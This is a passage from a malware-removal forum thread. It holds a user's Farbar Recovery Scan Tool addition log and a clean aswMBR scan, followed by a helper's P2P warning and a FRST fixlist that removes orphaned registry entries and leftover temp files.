FirewallRules: [{9F777184-4A13-4D03-A7C0-01D49AEABDDE}] => (Allow) D:\Steam\SteamApps\common\BioShock 2\SP\Builds\Binaries\Bioshock2Launcher.exe
FirewallRules: [{FCA495C1-8148-4FE6-A6C4-C517B16D4099}] => (Allow) D:\Steam\SteamApps\common\BioShock 2\SP\Builds\Binaries\Bioshock2Launcher.exe
FirewallRules: [{1E57FFC8-E277-4527-A558-4E533468C4FD}] => (Allow) D:\Steam\SteamApps\common\Bioshock\Builds\Release\Bioshock.exe
FirewallRules: [{FF7C891B-641F-403F-BDCB-015433DB2BB8}] => (Allow) D:\Steam\SteamApps\common\Bioshock\Builds\Release\Bioshock.exe
FirewallRules: [{67B411DD-238B-4813-AF90-1F0C53336E41}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2880\Agent.exe
FirewallRules: [{0B80C1B4-520A-43F6-A486-2689BB9F4589}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2880\Agent.exe
FirewallRules: [{D1348AB0-4C36-4E08-AEE7-833E635A6B76}] => (Allow) D:\Steam\SteamApps\common\Contagion\contagionds.exe
FirewallRules: [{7FC743AA-D733-419F-8042-A035AD45F3B5}] => (Allow) D:\Steam\SteamApps\common\Contagion\contagionds.exe
FirewallRules: [{F5F95BD3-A35E-44EE-A112-E2F68B3D3A0A}] => (Allow) D:\Steam\SteamApps\common\Contagion\contagion.exe
FirewallRules: [{112C8525-A869-473F-A5AE-968AEB8835F7}] => (Allow) D:\Steam\SteamApps\common\Contagion\contagion.exe
FirewallRules: [{20B0CC62-3200-4EEF-B0B7-37B644402890}] => (Allow) D:\Steam\SteamApps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{EF08C331-87FB-4CC5-ACB3-8EE65B40BA62}] => (Allow) D:\Steam\SteamApps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{BF9681B5-75E6-4BB8-A9E8-33A6536FD70F}] => (Allow) D:\Steam\SteamApps\common\Arma 3\arma3.exe
FirewallRules: [{D7D86F73-58B4-4297-BD11-31694ED9AAE0}] => (Allow) D:\Steam\SteamApps\common\Arma 3\arma3.exe
FirewallRules: [{DD0DCF4C-E8E1-49DD-900A-DD6AC7BC5C3C}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2816\Agent.exe
FirewallRules: [{CF01C627-5181-49F6-8E87-A4C0CBDD7CA7}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2816\Agent.exe
FirewallRules: [{7E20D8C2-63C2-4175-95E6-1343C3ECD0C6}] => (Allow) D:\Steam\SteamApps\common\Team Fortress 2\hl2.exe
FirewallRules: [{491A2AED-C695-4F06-BA71-CB7838E9C4FF}] => (Allow) D:\Steam\SteamApps\common\Team Fortress 2\hl2.exe
FirewallRules: [{5E2969A1-BE68-4265-A8FC-7097A7ECBB11}] => (Allow) D:\Steam\SteamApps\common\BattleNations\bin\battlenations.exe
FirewallRules: [{74E554AC-E08A-4335-B417-29987ADE8453}] => (Allow) D:\Steam\SteamApps\common\BattleNations\bin\battlenations.exe
FirewallRules: [{A03CA821-5944-4FD4-AA99-63D9A7D540E2}] => (Allow) D:\Hearthstone\Hearthstone.exe
FirewallRules: [{7D59F7B3-275B-4781-B5B3-F54F6611ABE6}] => (Allow) D:\Hearthstone\Hearthstone.exe
FirewallRules: [{A01AFC7A-FADD-4E17-B5C6-7189DE2CD1CE}] => (Allow) D:\StarCraft II\StarCraft II.exe
FirewallRules: [{700AEC12-F515-4E9F-AE1F-ACFE78622256}] => (Allow) D:\StarCraft II\StarCraft II.exe
FirewallRules: [{ABA0ADF7-7B84-4F79-85B1-13F0FF4024DE}] => (Allow) D:\Diablo III\Diablo III.exe
FirewallRules: [{6CF41658-1CD6-4500-AC43-A82F127ACABB}] => (Allow) D:\Diablo III\Diablo III.exe
FirewallRules: [{C2481D3E-C354-4753-BD12-A8F578C331BF}] => (Allow) D:\Steam\SteamApps\common\DayZ\DayZ.exe
FirewallRules: [{16888A73-5F47-429F-A727-2E2184704346}] => (Allow) D:\Steam\SteamApps\common\DayZ\DayZ.exe
FirewallRules: [{7CD9AF2C-6572-4973-B88A-D6A325B74B4F}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\dota.exe
FirewallRules: [{F9A7B398-94AE-45D6-8514-BEA802B1E5E2}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\dota.exe
FirewallRules: [{512EF9C6-D108-459F-8832-0603753D2F89}] => (Allow) C:\Users\Kym\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{B598ABAB-0FDC-43A9-BD15-FF9FF99D712C}] => (Allow) C:\Users\Kym\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{E4955EAC-E367-495F-B0A4-89B8B7610B29}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{416A0B8C-2763-42F0-82EB-9269719E1BE4}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{15969D30-C471-468E-B2ED-1594FE384FC3}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{08FE19D4-7434-48EA-A27A-93ED53D7717A}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{933A444B-2C3D-45AC-80E9-EFE8EB8DAD9D}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{EF266A5B-42EB-4853-A982-4DED1ADF6F73}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{BC4FFE1F-5AF4-4233-8E52-5094D6FE9F07}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{31F097A5-8E00-4169-A16D-1C9A71721FA1}] => (Allow) D:\Steam\Steam.exe
FirewallRules: [{F5C42520-0135-45B4-8FB0-5BD9692C80EE}] => (Allow) D:\Steam\Steam.exe
FirewallRules: [TCP Query User{3D2AB9FC-2A79-4098-9681-6706A621D53F}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe
FirewallRules: [UDP Query User{09124E07-AE4B-4C80-A7E2-E96A37034496}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe
FirewallRules: [{923D26F5-A4EE-433D-BE2B-5CE473180539}] => (Allow) C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe
FirewallRules: [{E6F2E9A0-F842-4541-8D31-CE38FDD09EDE}] => (Allow) C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe
FirewallRules: [{F906BBDC-3C41-494C-A264-2234D81FEF3E}] => (Block) D:\Program Files\Adobe\Adobe Premiere Elements 2011\Adobe Premiere Elements 11\Adobe Premiere Elements.exe
FirewallRules: [{BD0F045D-D2C0-41A7-8024-69C5F302A95F}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{7710A3C2-777C-4F45-BA7E-19121D633EB3}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{7172F858-7B10-43BC-B718-09A53F078F3C}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{6B94AB4E-EBC9-430B-A32F-B62386B68D88}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{F70F4B42-49F1-4B1A-B8A8-FCF794C81494}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{045729B0-69AA-489E-BE8C-C51AC1A7B953}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{92708362-07EC-40D9-A2DB-B96340F268FB}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{4B096532-9213-4604-8B21-D8BCE26411CE}] => (Allow) C:\Program Files (x86)\Remote Mouse\RemoteMouse.exe
FirewallRules: [{0104B469-8DD7-41D2-9979-185C8C113A44}] => (Allow) C:\Program Files (x86)\Remote Mouse\RemoteMouse.exe
FirewallRules: [{83A03678-B554-4993-9E39-0C22F10E135B}] => (Allow) D:\SPSS\stats.com
FirewallRules: [{091CE1FB-5C3F-4138-8341-49FEB2CFD24B}] => (Allow) D:\SPSS\stats.exe
FirewallRules: [{9576161E-2723-4775-B358-84BB54C518DA}] => (Allow) D:\SPSS\stats.com
FirewallRules: [{5CABC212-DC4A-4B5F-A0FE-532EA8330453}] => (Allow) D:\SPSS\stats.exe
FirewallRules: [{394EAA14-7FAC-47B7-B3D9-7B4756AB1A7B}] => (Allow) D:\SPSS\WinWrapIDE.exe
FirewallRules: [{16A7A8A5-316D-425F-870E-5896D1CE4C33}] => (Allow) D:\SPSS\WinWrapIDE.exe
FirewallRules: [{79364F63-7C39-456E-AB8F-8757D05D824C}] => (Allow) D:\Steam\SteamApps\common\GarrysMod\hl2.exe
FirewallRules: [{54FF873C-F71A-4CCF-8775-0C1D01F98DE2}] => (Allow) D:\Steam\SteamApps\common\GarrysMod\hl2.exe
FirewallRules: [{3B43C12B-BCDF-45BF-B840-0535E1E51BB0}] => (Allow) D:\Ubisoft Game Launcher\games\Rainbow Six Siege - Open Beta\RainbowSix.exe
FirewallRules: [{E52DF45C-B750-4C08-A94D-1C9E5FD0C9E0}] => (Allow) D:\Ubisoft Game Launcher\games\Rainbow Six Siege - Open Beta\RainbowSix.exe
FirewallRules: [TCP Query User{5FA1C1D8-35DC-4C59-B59E-E79663992D79}C:\program files (x86)\remote mouse\remotemouse.exe] => (Allow) C:\program files (x86)\remote mouse\remotemouse.exe
FirewallRules: [UDP Query User{B382372C-70E0-4294-8918-424DD03F9B35}C:\program files (x86)\remote mouse\remotemouse.exe] => (Allow) C:\program files (x86)\remote mouse\remotemouse.exe
FirewallRules: [{779D02B6-A237-497E-8EA6-A0FE4181802E}] => (Allow) D:\Steam\SteamApps\common\Clicker Heroes\Clicker Heroes.exe
FirewallRules: [{8F8BCB79-A539-484F-91B1-F34943ED9B63}] => (Allow) D:\Steam\SteamApps\common\Clicker Heroes\Clicker Heroes.exe
FirewallRules: [{FA6B12F6-052C-4390-B321-7E5ED5365770}] => (Allow) D:\Steam\SteamApps\common\Tom Clancy's Rainbow Six Siege\RainbowSix.exe
FirewallRules: [{FD71A44F-D3A8-4A46-B9B5-A3FFF96D2B7A}] => (Allow) D:\Steam\SteamApps\common\Tom Clancy's Rainbow Six Siege\RainbowSix.exe
FirewallRules: [{3E390A03-0EC6-460A-AFF8-07A3B3CE42A7}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{F56F3DD1-6F01-4E52-AF5A-050CF4A4240E}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{133D51D8-9D57-49D0-A255-8F344FBE942D}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [{7EFE47F1-0DAB-47F3-BB87-FB89C0045DAF}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [{3D3C4B45-00E1-45D2-A21E-63FFE437D631}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe] => Enabled:Spybot - Search & Destroy tray access
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe] => Enabled:Spybot-S&D 2 Scanner Service
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe] => Enabled:Spybot-S&D 2 Updater
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe] => Enabled:Spybot-S&D 2 Background update service
==================== Restore Points =========================
12-02-2016 19:34:43 Windows Update
15-02-2016 13:41:32 Windows Backup
18-02-2016 15:21:16 Windows Update
21-02-2016 16:50:40 Windows Update
21-02-2016 19:00:07 Windows Backup
28-02-2016 19:00:09 Windows Backup
==================== Faulty Device Manager Devices =============
==================== Event log errors: =========================
Application errors:
==================
Error: (02/29/2016 08:34:29 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
Description: Activation of app Microsoft.XboxApp_8wekyb3d8bbwe!Microsoft.XboxApp failed with error: -2147009284 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (02/29/2016 08:34:29 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
Description: Activation of app Microsoft.WindowsAlarms_8wekyb3d8bbwe!App failed with error: -2147009284 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (02/29/2016 08:32:37 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
Description: Activation of app Microsoft.WindowsAlarms_8wekyb3d8bbwe!App failed with error: -2147009284 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (02/29/2016 08:31:37 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
Description: Activation of app Microsoft.Getstarted_2.6.12.0_x64__8wekyb3d8bbwe:App.AppX7mv0s3r0wanj0n66dy6vax24ps6avzvz.mca failed with error: -2144927149 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (02/29/2016 08:31:37 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2147023170 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (02/29/2016 08:31:36 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: SearchUI.exe, version: 10.0.10240.16603, time stamp: 0x5655390b
Faulting module name: CortanaApi.dll, version: 0.0.0.0, time stamp: 0x56553724
Exception code: 0x80000003
Fault offset: 0x0000000000151c4f
Faulting process id: 0x6e4
Faulting application start time: 0xSearchUI.exe0
Faulting application path: SearchUI.exe1
Faulting module path: SearchUI.exe2
Report Id: SearchUI.exe3
Faulting package full name: SearchUI.exe4
Faulting package-relative application ID: SearchUI.exe5
Error: (02/29/2016 08:30:18 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2147023170 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (02/29/2016 08:30:18 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: SearchUI.exe, version: 10.0.10240.16603, time stamp: 0x5655390b
Faulting module name: CortanaApi.dll, version: 0.0.0.0, time stamp: 0x56553724
Exception code: 0x80000003
Fault offset: 0x0000000000151c4f
Faulting process id: 0xab4
Faulting application start time: 0xSearchUI.exe0
Faulting application path: SearchUI.exe1
Faulting module path: SearchUI.exe2
Report Id: SearchUI.exe3
Faulting package full name: SearchUI.exe4
Faulting package-relative application ID: SearchUI.exe5
Error: (02/29/2016 08:30:17 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2147023170 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (02/29/2016 08:30:17 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2147023170 See the Microsoft-Windows-TWinUI/Operational log for additional information.
System errors:
=============
Error: (02/29/2016 08:35:26 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80073cf9: Windows Alarms & Clock.
Error: (02/29/2016 08:35:26 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80070490: Windows Alarms & Clock.
Error: (02/29/2016 08:35:20 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80073cf9: Windows Alarms & Clock.
Error: (02/29/2016 08:35:20 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80070490: Windows Alarms & Clock.
Error: (02/29/2016 08:34:28 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Intel(R) Management and Security Application Local Management Service service failed to start due to the following error:
%%2
Error: (02/29/2016 08:34:28 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Intel(R) Dynamic Application Loader Host Interface Service service failed to start due to the following error:
%%2
Error: (02/29/2016 08:32:23 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Net.Tcp Listener Adapter service depends on the Net.Tcp Port Sharing Service service which failed to start because of the following error:
%%1058
Error: (02/29/2016 08:32:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The LogMeIn Hamachi Tunneling Engine service failed to start due to the following error:
%%2
Error: (02/29/2016 08:31:47 PM) (Source: DCOM) (EventID: 10005) (User: KYM-PC)
Description: 1084WSearchUnavailable{7D096C5F-AC08-4F1F-BEB7-5C22C517CE39}
Error: (02/29/2016 08:31:47 PM) (Source: DCOM) (EventID: 10005) (User: KYM-PC)
Description: 1084WSearchUnavailable{7D096C5F-AC08-4F1F-BEB7-5C22C517CE39}
CodeIntegrity:
===================================
Date: 2016-02-13 23:54:36.285
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\Microsoft.StdFormat\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.StdFormat.dll that did not meet the Microsoft signing level requirements.
Date: 2016-02-13 23:54:36.256
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\ADODB.dll that did not meet the Microsoft signing level requirements.
Date: 2016-02-13 23:54:36.214
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\MSDATASRC\7.0.3300.0__b03f5f7f11d50a3a\MSDATASRC.dll that did not meet the Microsoft signing level requirements.
Date: 2016-02-13 23:54:36.157
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\Microsoft.StdFormat\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.StdFormat.dll that did not meet the Microsoft signing level requirements.
Date: 2016-02-13 23:54:36.135
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\ADODB.dll that did not meet the Microsoft signing level requirements.
Date: 2016-02-13 23:54:36.113
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\MSDATASRC\7.0.3300.0__b03f5f7f11d50a3a\MSDATASRC.dll that did not meet the Microsoft signing level requirements.
Date: 2016-02-13 23:54:35.470
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\stdole\7.0.3300.0__b03f5f7f11d50a3a\stdole.dll that did not meet the Microsoft signing level requirements.
Date: 2016-02-13 23:54:35.328
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\stdole\7.0.3300.0__b03f5f7f11d50a3a\stdole.dll that did not meet the Microsoft signing level requirements.
Date: 2016-02-13 23:51:19.676
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\Microsoft.StdFormat\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.StdFormat.dll that did not meet the Microsoft signing level requirements.
Date: 2016-02-13 23:51:19.646
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\ADODB.dll that did not meet the Microsoft signing level requirements.
==================== Memory info ===========================
Processor: Intel(R) Core(TM) i5-4670K CPU @ 3.40GHz
Percentage of memory in use: 16%
Total physical RAM: 16271.13 MB
Available physical RAM: 13512.53 MB
Total Virtual: 32655.13 MB
Available Virtual: 29616.68 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:111.69 GB) (Free:13.97 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive d: (New Volume) (Fixed) (Total:931.41 GB) (Free:512.93 GB) NTFS
Drive f: (Seagate Expansion Drive) (Fixed) (Total:1863.02 GB) (Free:333.52 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 4E0A8E17)
Partition 1: (Not Active) - (Size=931.4 GB) - (Type=07 NTFS)
========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 111.8 GB) (Disk ID: 4B95E549)
Partition 1: (Active) - (Size=111.7 GB) - (Type=07 NTFS)
========================================================
Disk: 2 (Size: 1863 GB) (Disk ID: 908BDE7D)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)
==================== End of Addition.txt ============================
aswMBR version 1.0.1.2252 Copyright(c) 2014 AVAST Software
Run date: 2016-02-29 20:47:33
-----------------------------
20:47:33.992 OS Version: Windows x64 6.2.9200
20:47:33.992 Number of processors: 4 586 0x3C03
20:47:33.992 ComputerName: KYM-PC UserName: Kym
20:47:34.235 Initialize success
20:47:34.242 VM: initialized successfully
20:47:34.243 VM: Intel CPU supported virtualized
20:47:43.424 VM: disk I/O iaStorA.sys
20:47:45.547 AVAST engine defs: 16022900
20:47:52.042 Disk 0 \Device\Harddisk0\DR0 -> \Device\0000002f
20:47:52.043 Disk 0 Vendor: WDC_WD10EZRX-00A8LB0 01.01A01 Size: 953869MB BusType: 11
20:47:52.046 Disk 1 (boot) \Device\Harddisk1\DR1 -> \Device\00000030
20:47:52.047 Disk 1 Vendor: Samsung_SSD_840_EVO_120GB EXT0BB6Q Size: 114473MB BusType: 11
20:47:52.054 Disk 1 MBR read successfully
20:47:52.056 Disk 1 MBR scan
20:47:52.058 Disk 1 Windows 7 default MBR code
20:47:52.060 Disk 1 Partition 1 80 (A) 07 HPFS/NTFS NTFS 114371 MB offset 206848
20:47:52.066 Disk 1 scanning C:\WINDOWS\system32\drivers
20:47:52.741 Service scanning
20:47:55.885 Modules scanning
20:47:55.904 Disk 1 trace - called modules:
20:47:55.923 ntoskrnl.exe CLASSPNP.SYS disk.sys ACPI.sys storport.sys hal.dll iaStorA.sys
20:47:55.931 1 nt!IofCallDriver -> \Device\Harddisk1\DR1[0xffffe0019a1e4060]
20:47:55.936 3 CLASSPNP.SYS[fffff8004bcb46c5] -> nt!IofCallDriver -> [0xffffe00199b88970]
20:47:55.942 5 ACPI.sys[fffff8004ae21361] -> nt!IofCallDriver -> [0xffffe00199b8e040]
20:47:55.947 7 ACPI.sys[fffff8004ae21361] -> nt!IofCallDriver -> \Device\00000030[0xffffe00199b90060]
20:47:56.102 AVAST engine scan C:\WINDOWS
20:47:56.331 AVAST engine scan C:\WINDOWS\system32
20:48:15.220 AVAST engine scan C:\WINDOWS\system32\drivers
20:48:16.311 AVAST engine scan C:\Users\Kym
20:49:36.627 AVAST engine scan C:\ProgramData
20:49:55.722 Disk 1 statistics 3041260/0/0 @ 20.88 MB/s
20:49:55.726 Scan finished successfully
20:50:05.349 Disk 1 MBR has been saved successfully to "C:\Users\Kym\Desktop\MBR.dat"
20:50:05.352 The log file has been saved successfully to "C:\Users\Kym\Desktop\aswMBR.txt"
kym.preston
2016-02-29, 13:18
I have also backed up my registry
P2P Warning
------------------------------
I see you have peer-to-peer (P2P) file sharing software installed on your computer (uTorrent). I advise you avoid P2P file sharing programmes; they are a security risk which can make your computer susceptible to malware. File sharing networks are thoroughly infected and infested with malware - worms (http://en.wikipedia.org/wiki/Computer_worm), backdoor Trojans (http://www.symantec.com/security_response/writeup.jsp?docid=2001-062614-1754-99), IRCBots (http://en.wikipedia.org/wiki/IRC_bot), and rootkits (http://en.wikipedia.org/wiki/Rootkit) propagate via P2P file sharing networks, gaming, and underground sites. Users visiting such pages may see innocuous-looking banner ads containing code which can trigger pop-up ads and malicious Flash ads that install viruses, Trojans, and spyware. The best way to reduce the risk of infection is to avoid these types of web sites and not use P2P applications. Please read the following articles for more information.
Risks of File-Sharing Technology (http://www.us-cert.gov/cas/tips/ST05-007.html)
P2P Software User Advisories (http://aresgalaxy.sourceforge.net/p2prisks.htm)
More malware is traveling on P2P networks these days (http://www.computerworld.com/s/article/9240067/More_malware_is_traveling_on_P2P_networks_these_days)
Your P2P software can be removed by following the instructions below.
Press the Windows Key http://i.imgur.com/pdKOQKY.png + r on your keyboard at the same time. Type appwiz.cpl and click OK.
Search for the aforementioned programme(s), right-click and click Uninstall.
If you choose not to, please refrain from using the programme(s) during this process.
~~~~~~~~~~~~~~~~~~~~~~~~~
Please open Notepad *Do Not Use Wordpad!* or use any other text editor than Notepad or the script will fail. (Start -> Run -> type notepad in the Open field -> OK) and copy and paste the text present inside the quote box below:
To do this highlight the contents of the box and right click on it and select copy.
Paste this into the open notepad. save it to the Desktop as fixlist.txt
NOTE. It's important that both files, FRST/FRST64 and fixlist.txt are in the same location or the fix will not work.
It needs to be saved Next to the "Farbar Recovery Scan Tool" (If asked to overwrite existing one please allow)
https://dl.dropboxusercontent.com/u/73555776/FRSTfix.JPG
start
CreateRestorePoint:
CloseProcesses:
ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
ShellIconOverlayIdentifiers: [GDriveSharedOverlay] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} => No File
ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
SearchScopes: HKLM -> DefaultScope value is missing
SearchScopes: HKLM-x32 -> DefaultScope value is missing
BHO-x32: No Name -> {c4e7ab80-82fd-49d4-801d-669cc0a2392a} -> No File
FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [No File]
CHR Plugin: (Java(TM) Platform SE 7 U55) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll => No File
C:\Users\Kym\IP_Log_Data.js
C:\Users\Kym\Network_Meter_Data.js
C:\Users\Kym\AppData\Local\Temp\ICReinstall_setup.exe
C:\Users\Kym\AppData\Local\Temp\raptrpatch.exe
C:\Users\Kym\AppData\Local\Temp\raptr_stub.exe
